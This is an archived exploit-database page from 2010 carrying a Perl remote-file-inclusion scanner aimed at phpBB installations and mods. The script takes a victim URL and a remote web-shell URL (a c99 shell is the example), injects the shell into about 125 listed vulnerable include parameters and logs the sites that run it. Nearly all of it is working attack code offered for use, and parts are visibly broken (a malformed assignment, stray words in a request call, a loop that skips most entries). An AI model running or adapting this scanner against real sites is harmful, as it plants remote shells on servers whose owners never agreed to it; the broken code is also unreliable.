[webapps / 0day] - PHPbb v27.9 Inj3ct0r RFI Scanner
Posted on 27 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PHPbb v27.9 Inj3ct0r RFI Scanner | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='PHPbb v27.9 Inj3ct0r RFI Scanner by jos_ali_joe in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================== PHPbb - v27.9 Inj3ct0r RFI Scanner ================================== #!/usr/bin/perl 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit Database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I'm jos_ali_joe member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ############################################################ #RFI Scanner Perl PHPbb - v27.9 Inj3ct0r # #Coded by jos_ali_joe RFI Scanner Perl # #Indonesian Docer Team & member from Inj3ct0r Team # #Contact: josalijoe@yahoo.com # #Home : josalijoe.wordpress.com/ $ http://inj3ct0r.com # #ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael # ############################################################ use HTTP::Request; use LWP::UserAgent; sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title RFI Scanner Perl PHPbb - v27.9 "); system ("color 02"); } } &lw; print " ######################################################## "; print " ## RFI Scanner PHPbb v27.9 Inj3ct0r ## "; print " ## by jos_ali_joe ## "; print " ## special thanks : gunslinger_ & r0073r ## "; print " ######################################################## "; print "Insert host:(ex: http://www.maho.com/) "; $host=<STDIN>; chomp $host; print " "; # If the url doesn't have http: at the beginning if ( $host !~ /^http:/ ) { # we add it $host = 'http://' . $host; } # If the url doesn't have / at the end if ( $host !~ //$/ ) { # we add it $host = $host . '/'; } print "Insert shell:(ex: http://www.maho.com/c99.txt) "; $shell=<STDIN>; chomp $shell; print " "; # If the url doesn't have http: at the beginning if ( $shell !~ /^http:/ ) { # we add it $shell = 'http://' . $shell; } print "Insert string search:(ex: c99shell) "; $string=<STDIN>; chomp $string; print " "; print "Your config: "; print " Victim: $host "; print " Url Shell: $shell "; print " Search String: $string "; print "Scan... "; $vuln1="/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]="; $vuln2="/includes/functions_portal.php?phpbb_root_path="; $vuln3="/includes/functions_mod_user.php?phpbb_root_path="; $vuln4="/includes/openid/Auth/OpenID/BBStore.php?openid_root_path="; $vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path="; $vuln6="/language/lang_german/lang_main_album.php?phpbb_root_path="; $vuln7="/link_main.php?phpbb_root_path="; $vuln8="/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH="; $vuln9="MOD_forum_fields_parse.php?phpbb_root_path="; $vuln10="/codebb/pass_code.php?phpbb_root_path="; $vuln11="/codebb/lang_select?phpbb_root_path="; $vuln12="/includes/functions_nomoketos_rules.php?phpbb_root_path="; $vuln13="/includes/functions.php?phpbb_root_path="; $vuln14="/admin/admin_forum_prune.php?phpbb_root_path="; $vuln15="/ezconvert/config.php?ezconvert_dir="; $vuln16="/includes/class_template.php?phpbb_root_path="; $vuln17="/includes/usercp_viewprofile.php?phpbb_root_path="; $vuln18="/includes/functions.php?phpbb_root_path="; $vuln19="/menu.php?sesion_idioma="; $vuln20="/includes/functions.php?phpbb_root_path="; $vuln21="/admin/admin_linkdb.php?phpbb_root_path="; $vuln22="/admin/admin_extensions.php?phpbb_root_path="; $vuln23="/admin/admin_board.php?phpbb_root_path="; $vuln24="/admin/admin_attachments.php?phpbb_root_path="; $vuln25="/admin/admin_users.php?phpbb_root_path="; $vuln26="/includes/archive/archive_topic.php?phpbb_root_path="; $vuln28="/admin/modules_data.php?phpbb_root_path="; $vuln29="/faq.php?foing_root_path="; $vuln30="/index.php?foing_root_path="; $vuln31="/list.php?foing_root_path="; $vuln32="/login.php?foing_root_path="; $vuln33="/playlist.php?foing_root_path="; $vuln34="/song.php?foing_root_path="; $vuln35="/gen_m3u.php?foing_root_path="; $vuln36="/view_artist.php?foing_root_path="; $vuln37="/view_song.php?foing_root_path="; $vuln38="/login.php?foing_root_path="; $vuln39="/flash/set_na.php?foing_root_path="; $vuln40="/flash/initialise.php?foing_root_path="; $vuln41="/flash/get_song.php?foing_root_path="; $vuln42="/includes/common.php?foing_root_path="; $vuln43="/admin/nav.php?foing_root_path="; $vuln44="/admin/main.php?foing_root_path="; $vuln45="/admin/list_artists.php?foing_root_path="; $vuln46="/admin/index.php?foing_root_path="; $vuln47="/admin/genres.php?foing_root_path="; $vuln48="/admin/edit_artist.php?foing_root_path="; $vuln49="/admin/edit_album.php?foing_root_path="; $vuln50="/admin/config.php?foing_root_path="; $vuln51="/admin/admin_status.php?foing_root_path="; $vuln52="language/lang_english/lang_prillian_faq.php?phpbb_root_path="; $vuln53="/includes/functions_mod_user.php?phpbb_root_path="; $vuln54="/language/lang_french/lang_prillian_faq.php?phpbb_root_path="; $vuln55="/includes/archive/archive_topic.php?phpbb_root_path="; $vuln56="/functions_rpg_events.php?phpbb_root_path="; $vuln57="/admin/admin_spam.php?phpbb_root_path="; $vuln58="/includes/functions_newshr.php?phpbb_root_path="; $vuln59="/zufallscodepart.php?phpbb_root_path="; $vuln60="/mods/iai/includes/constants.php?phpbb_root_path="; $vuln61="/root/includes/antispam.php?phpbb_root_path="; $vuln62="/phpBB2/shoutbox.php?phpbb_root_path="; $vuln63="/includes/functions_mod_user.php?phpbb_root_path="; $vuln64="/includes/functions_mod_user.php?phpbb_root_path="; $vuln65="/includes/journals_delete.php?phpbb_root_path="; $vuln66="/includes/journals_post.php?phpbb_root_path="; $vuln67="/includes/journals_edit.php?phpbb_root_path="; $vuln68="/includes/functions_num_image.php?phpbb_root_path="; $vuln69="/includes/functions_user_viewed_posts.php?phpbb_root_path="; $vuln70="/includes/themen_portal_mitte.php?phpbb_root_path="; $vuln71="/includes/logger_engine.php?phpbb_root_path="; $vuln72="/includes/logger_engine.php?phpbb_root_path="; $vuln73="/includes/functions_static_topics.php?phpbb_root_path="; $vuln74="/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path="; $vuln75="/includes/functions_kb.php?phpbb_root_path="; $vuln76="/includes/bbcb_mg.php?phpbb_root_path="; $vuln77="/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path="; $vuln78="/includes/pafiledb_constants.php?module_root_path="; $vuln79="/index.php?phpbb_root_path="; $vuln80="/song.php?phpbb_root_path="; $vuln81="/faq.php?phpbb_root_path="; $vuln82="/list.php?phpbb_root_path="; $vuln83="/gen_m3u.php?phpbb_root_path="; $vuln84="/playlist.php?phpbb_root_path="; $vuln85="/language/lang_english/lang_activity.php?phpbb_root_path="; $vuln86="/language/lang_english/lang_activity.php?phpbb_root_path="; $vuln87="/blend_data/blend_common.php?phpbb_root_path="; $vuln88="/blend_data/blend_common.php?phpbb_root_path="; $vuln89="/modules/Forums/admin/index.php?phpbb_root_path="; $vuln90="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path="; $vuln91="/modules/Forums/admin/admin_board.php?phpbb_root_path="; $vuln92="/modules/Forums/admin/admin_disallow.php?phpbb_root_path="; $vuln93="/modules/Forums/admin/admin_forumauth.php?phpbb_root_path="; $vuln94="/modules/Forums/admin/admin_groups.php?phpbb_root_path="; $vuln95="/modules/Forums/admin/admin_ranks.php?phpbb_root_path="; $vuln96="/modules/Forums/admin/admin_styles.php?phpbb_root_path="; $vuln97="/modules/Forums/admin/admin_user_ban.php?phpbb_root_path="; $vuln98="/modules/Forums/admin/admin_words.php?phpbb_root_path="; $vuln99="/modules/Forums/admin/admin_avatar.php?phpbb_root_path="; $vuln100="/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path="; $vuln101="/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path="; $vuln102="/modules/Forums/admin/admin_forums.php?phpbb_root_path="; $vuln103="/modules/Forums/admin/admin_mass_email.php?phpbb_root_path="; $vuln104="/modules/Forums/admin/admin_smilies.php?phpbb_root_path="; $vuln105="$vuln58="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path="; $vuln106="/modules/Forums/admin/admin_users.php?phpbb_root_path="; $vuln107="/stat_modules/users_age/module.php?phpbb_root_path="; $vuln108="/includes/functions_cms.php?phpbb_root_path="; $vuln109="/m2f/m2f_phpbb204.php?m2f_root_path="; $vuln110="/m2f/m2f_forum.php?m2f_root_path="; $vuln111="/m2f/m2f_mailinglist.php?m2f_root_path="; $vuln112="/m2f/m2f_cron.php?m2f_root_path="; $vuln113="/lib/phpbb.php?subdir="; $vuln114="/includes/functions_mod_user.php?phpbb_root_path="; $vuln115="/includes/functions.php?phpbb_root_path="; $vuln116="/includes/functions_portal.php?phpbb_root_path="; $vuln117="/includes/functions.php?phpbb_root_path="; $vuln118="/includes/functions_admin.php?phpbb_root_path="; $vuln119="/toplist.php?f=toplist_top10&phpbb_root_path="; $vuln120="/admin/addentry.php?phpbb_root_path="; $vuln121="/includes/kb_constants.php?module_root_path="; $vuln122="/auth/auth.php?phpbb_root_path="; $vuln123="/auth/auth_phpbb/phpbb_root_path="; $vuln124="/auction/auction_common.php?phpbb_root_path="; $vuln125="/auth/auth_SMF/smf_root_path="; $vuln126="/auth/auth.php?smf_root_path="; for ($i=1;$i<59;$i++) { $cont=vuln.$i; chomp $cont; print "$cont "; $final=$host.$$cont."$shell?"; my $req=HTTP::Request->new(GET=>$final alias selesai); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if ($response->is_success) { if( $response->content =~ /$string/){ open(FILE,">>results.txt"); print FILE "$final "; close(FILE); print "------------------------------------------------- "; print "$final "; print "IS VULNZ.. "; print "------------------------------------------------- "; }} } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-27]</pre></body></html>
